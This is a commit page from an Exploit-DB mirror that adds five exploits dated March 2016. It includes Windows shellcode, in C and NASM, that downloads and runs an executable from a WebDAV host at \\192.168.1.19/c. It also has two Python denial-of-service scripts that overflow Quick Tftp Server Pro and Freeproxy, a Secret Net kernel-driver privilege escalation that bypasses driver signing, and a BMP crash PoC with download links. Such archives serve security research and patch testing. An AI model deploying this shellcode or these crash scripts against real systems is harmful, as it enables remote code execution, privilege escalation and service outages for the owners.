bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-03-03

Browse source 
5 new exploits
This commit is contained in:
Offensive Security 2016-03-03 05:02:14 +00:00
parent 7f6ad99482
commit 04bd5476ad
6 changed files with 285 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -35753,3 +35753,8 @@ id,file,description,date,author,platform,type,port
39513,platforms/php/webapps/39513.txt,"WordPress CP Polls Plugin 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 SQL Injection / Remote Code Execution",2016-03-01,metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"NETGEAR ProSafe Network Management System 300 Arbitrary File Upload",2016-03-01,metasploit,windows,remote,8080
39516,platforms/windows/dos/39516.py,"Quick Tftp Server Pro 2.3 - Read Mode Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,69
39517,platforms/windows/dos/39517.py,"Freeproxy Internet Suite 4.10 - Denial of Service",2016-03-02,"Guillaume Kaddouch",windows,dos,8080
39518,platforms/windows/dos/39518.txt,"PictureTrails Photo Editor GE.exe 2.0.0 - .bmp Crash PoC",2016-03-02,redknight99,windows,dos,0
39519,platforms/win32/shellcode/39519.c,"x86 Windows Null-Free Download & Run via WebDAV Shellcode (96 bytes)",2016-03-02,"Sean Dillon",win32,shellcode,0
39520,platforms/win64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Local Privilege Escalation",2016-03-02,Cr4sh,win64,local,0

Can't render this file because it is too large.

144
platforms/win32/shellcode/39519.c Executable file
View file

@ -0,0 +1,144 @@
/*
* Author: Sean Dillon
* Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
* Release Date: March 1, 2016
*
* Description: x86 Windows null-free download & run via WebDAV shellcode
* Assembled Size: 96 bytes
* Tested On: Windows XP, Windows 10
* License: http://opensource.org/licenses/MIT
*
* Build/Run: MSVC with /NXCOMPAT:NO in Propertes->Linker->Advanced->DEP
*/
/*
* NOTE: This C code connects to WebDAV at \\192.168.1.19:80/c to download and execute an .exe.
* The WinExec() API downloads and runs dirty files from UNC paths with the "WebClient" daemon.
* The end of this file contains the .nasm source code and instructions for building from that.
*/
#include <stdio.h>
#include <string.h>
char shellcode[] =
"\x6a\x30" /* push $0x30 */
"\x5e" /* pop %esi */
"\x64\xad" /* lods %fs:(%esi),%eax */
"\x8b\x40\x0c" /* mov 0xc(%eax),%eax */
"\x8b\x70\x0c" /* mov 0xc(%eax),%esi */
"\xad" /* lods %ds:(%esi),%eax */
"\x8b\x10" /* mov (%eax),%edx */
"\x8b\x5a\x18" /* mov 0x18(%edx),%ebx */
"\x89\xd9" /* mov %ebx,%ecx */
"\x03\x49\x3c" /* add 0x3c(%ecx),%ecx */
"\x8b\x49\x78" /* mov 0x78(%ecx),%ecx */
"\x01\xd9" /* add %ebx,%ecx */
"\x8b\x41\x20" /* mov 0x20(%ecx),%eax */
"\x01\xd8" /* add %ebx,%eax */
"\x31\xd2" /* xor %edx,%edx */
"\x52" /* push %edx */
"\x5f" /* pop %edi */
"\x8b\x34\x90" /* mov (%eax,%edx,4),%esi */
"\x01\xde" /* add %ebx,%esi */
"\x42" /* inc %edx */
"\x81\x3e\x57\x69\x6e\x45" /* cmpl $0x456e6957,(%esi) */
"\x75\xf2" /* jne 24 <find_winexec> */
"\x8b\x71\x24" /* mov 0x24(%ecx),%esi */
"\x01\xde" /* add %ebx,%esi */
"\x66\x8b\x14\x56" /* mov (%esi,%edx,2),%dx */
"\x8b\x71\x1c" /* mov 0x1c(%ecx),%esi */
"\x01\xde" /* add %ebx,%esi */
"\x8b\x74\x96\xfc" /* mov -0x4(%esi,%edx,4),%esi */
"\x01\xde" /* add %ebx,%esi */
"\x57" /* push %edi */
"\x68\x31\x39\x2f\x63" /* push $0x632f3931 */
"\x68\x38\x2e\x31\x2e" /* push $0x2e312e38 */
"\x68\x32\x2e\x31\x36" /* push $0x36312e32 */
"\x68\x5c\x5c\x31\x39" /* push $0x39315c5c */
"\x54" /* push %esp */
"\xff\xd6" /* call *%esi */
"\xeb\xfe"; /* jmp 5e <spin> */
int main()
{
printf("Shellcode length: %d\n", (int)strlen(shellcode));
(*(void(*)(void))&shellcode)();
return 0;
}
/* --------------------------------------------------------------------------------------
* Author: Sean Dillon
* Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
* Release Date: March 1, 2016
*
* Description: x86 Windows null-free download & run via WebDAV shellcode
* Assembled Size: 96 bytes
* Tested On: Windows XP, Windows 10
* License: http://opensource.org/licenses/MIT
;
; Build/Run: nasm -o webdav.o webdav.nasm
; ld -o webdav webdav.o
; objdump -d webdav
BITS 32
global _start
section .text
push 0x30 ; PEB offset
pop esi
db 0x64 ; dword ptr fs : []
lodsd ; eax = NtCurrentTeb()->ProcessEnvironmentBlock
mov eax, [eax + 0x0c] ; eax = PEB->Ldr
mov esi, [eax + 0x0c] ; eax = PEB->Ldr.InLoadOrder
lodsd
mov edx, [eax]
mov ebx, [edx + 0x18] ; ebx = GetModuleHandle(L"kernel32.dll")
mov ecx, ebx ; ecx = (IMAGE_DOS_HEADERS *)ebx
add ecx, [ecx + 0x3c] ; ecx = ecx->e_lfanew
mov ecx, [ecx + 0x78] ; ecx = ecx->OptionalHeader.DataDirectory[0].VirtualAddress
add ecx, ebx ; ecx = IMAGE_EXPORT_DIRECTORY
mov eax, [ecx + 0x20] ; eax = ecx->AddressOfNames
add eax, ebx
xor edx, edx ; edx = 0
push edx
pop edi ; edi = 0
find_winexec:
mov esi, [eax + edx * 4] ; esi = ExportNamePointerTable[edx]
add esi, ebx
inc edx ; ++edx
cmp dword [esi], 0x456e6957 ; if (memcmp(esi, "WinE", 4) != 0)
jne find_winexec ; goto find_winexec
mov esi, [ecx + 0x24] ; esi = ecx->AddressOfNameOrdinals
add esi, ebx
mov dx, [esi + edx * 2] ; dx = ExportOrdinalTable[edx]
mov esi, [ecx + 0x1c] ; esi = ecx->AddressOfFunctions
add esi, ebx ;
mov esi, [esi + edx * 4 - 4] ; esi = &WinExec()
add esi, ebx
push edi ; '\0'
push 0x632f3931
push 0x2e312e38
push 0x36312e32
push 0x39315c5c
push esp ; ss = \\192.168.1.19/c
; Python2 one-liner to generate host string stack pushes
; "0x"+"\n0x".join(map(''.join, zip(*[iter('\\\\192.168.1.19/c'[::-1].encode('hex'))]*8)))
call esi
spin: ; loop forever, downloaded process has taken over
jmp spin ; second stage can clean up
;--------------------------------------------------------------------------------------*/

14
platforms/win64/local/39520.txt Executable file
View file

@ -0,0 +1,14 @@
Source: https://github.com/Cr4sh/secretnet_expl
Secret Net 7 and Secret Net Studio 8 local privileges escalation exploit.
0day vulnerabilities in sncc0.sys kernel driver of Secrity Code products allows attacker to perform local privileges escalation from Guest to Local System. Also, attacker that has access to any Windows system may manually install sncc0.sys (that has valid digital signature from Security Code) and exploit it's vulnerability to bypass DSE and load unsigned kernel mode drivers on Windows x64 platforms.
For detailed vulnerability analysis and explanation of how sncc0_00220010_expl code works please read Windows DSE bypass part of my article "Exploiting SMM callout vulnerabilities in Lenovo firmware".
This exploit was tested with 64-bit versions of Windows 7, 8, 8.1 and 10. On SMEP enabled systems you have to manually restore original value of CR4 register to avoid PatchGuard bugchecks, for real life usage example please check my fwexpl project.
Proof of Concept:
https://github.com/Cr4sh/secretnet_expl/archive/master.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39520.zip

52
platforms/windows/dos/39516.py Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Quick Tftp Server Pro 2.3 TFTP mode Remote Overflow (DoS)
# Date: 21/01/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.tallsoft.com/tftpserver.htm
# Software Link: http://www.tallsoft.com/tftpserver_setup.exe
# Version: 2.3
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-21: Vulnerability discovered
2016-01-24: Vendor contacted
2016-01-29: Vendor contacted again (no answer)
2016-03-01: Vulnerability published
Description :
-------------
A remote overflow exists in Quick Tftp Server Pro 2.3 in the TFTP mode when sending a TFTP Read Request. This allows to remotely crash
the application, thus causing a Denial of Service.
Instructions:
-------------
- Starts Quick Tftp Server Pro 2.3
- Run this exploit locally or from your remote attacking machine
"""
import socket
host = "192.168.135.132"
port = 69
request = "\x00\x01" # TFTP Read Request (RRQ)
file = "file.txt"
mode = '\x41' * 1024 # Overflow
buffer = request + file + "\x00" + mode + "\x00"
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
print "[*] Sending buffer to %s (%d bytes)..." % (host, len(buffer))
s.sendto(buffer, (host, port))
s.close()
print "[*] Done."
except:
print "[-] Error connecting"

55
platforms/windows/dos/39517.py Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Freeproxy Internet Suite 4.10 Remote DoS
# Date: 01/03/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: http://www.handcraftedsoftware.org/
# Software Link: http://www.handcraftedsoftware.org/index.php?page=download&op=getFile&id=2&title=FreeProxy-Internet-Suite
# Version: 4.10.1751
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-01-29: Vulnerability discovered
2016-01-30: Vendor contacted
2016-03-01: Vulnerability published
Description :
-------------
A remote Denial Of Service exists in Freeproxy Internet Suite 4.10.1751 when sending a GET request to the proxy with an overly long URL.
Instructions:
-------------
- Starts Freeproxy Internet Suite
- Run this exploit locally or from your remote attacking machine. Multiple sends may be necessary to crash the application.
"""
import socket
host = "192.168.135.132"
port = 8080
junk = '\x41' * 5000
buffer = "GET http://::../%s/index.html HTTP/1.1\r\n" % junk
buffer += "Host: www.google.fr\r\n"
buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Sending buffer %d bytes..." % len(junk)
s.connect((host, port))
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"

15
platforms/windows/dos/39518.txt Executable file
View file

@ -0,0 +1,15 @@
# Exploit Title: PictureTrail Photo Editor GE.exe 2.00 - ./bmp Crash PoC
# Date: 01-03-2016
# Exploit Author: redknight99
# Vendor Homepage: http://www.picturetrail.com/
# Software Link: http://www.picturetrail.com/downloads/photoeditor200.exe
# Version: 2.0.0
# Tested on: Windows 7, 10
# CVE : Unknown
Picture Trail Photo editor fails to properly parse .bmp header height and width values.
Negative height and width values cause a program crash (memory corruption) and SEH corruption. Remote code execution may be possible.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39518.zip